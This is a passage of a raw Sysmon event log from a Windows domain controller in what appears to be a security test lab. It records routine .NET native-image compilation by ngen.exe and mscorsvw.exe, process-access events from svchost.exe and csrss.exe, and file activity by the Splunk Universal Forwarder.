icrosoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.545{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F8-60D3-1804-00000000CF01}6804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:56.498{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16c4-0\Microsoft.Windows.ServerManager.ServerComponentManager.dll2021-06-23 21:04:56.498 23542300x800000000000000021146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.404{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A680053146FD693DE04919BE6B9010E,SHA256=02E875EB61F0F6686C09E4CBBB36D937D7AEF8B10DCF3619A12170FF065129D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:56.154{4DB9351A-A1F7-60D3-1604-00000000CF01}65925328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:55.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F7-60D3-1704-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.973{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.942{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.942{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-2104-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:04:57.880{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1af0-0\Microsoft.Workflow.Compiler.exe2021-06-23 21:04:57.880 10341000x800000000000000021185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.817{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.770{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.770{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-2004-00000000CF01}6896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.580{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.564{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B533A7D1946950ED0CFF3E04F67F8C,SHA256=9E09FEF25963727D487DE8620A164294D4B4C7318E2F9D9ED6FF017C63AEEC03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.564{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.548{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1F04-00000000CF01}2072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.533{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\Microsoft.WindowsSearch.Commands.dll2021-06-23 21:04:57.533 10341000x800000000000000021177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.455{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.439{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.439{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1E04-00000000CF01}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.392{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.376{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.376{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1D04-00000000CF01}4192C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.345{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f98-0\Microsoft.WindowsAuthenticationProtocols.Commands.dll2021-06-23 21:04:57.345 10341000x800000000000000021170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.314{4DB9351A-A1F9-60D3-1B04-00000000CF01}65845332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 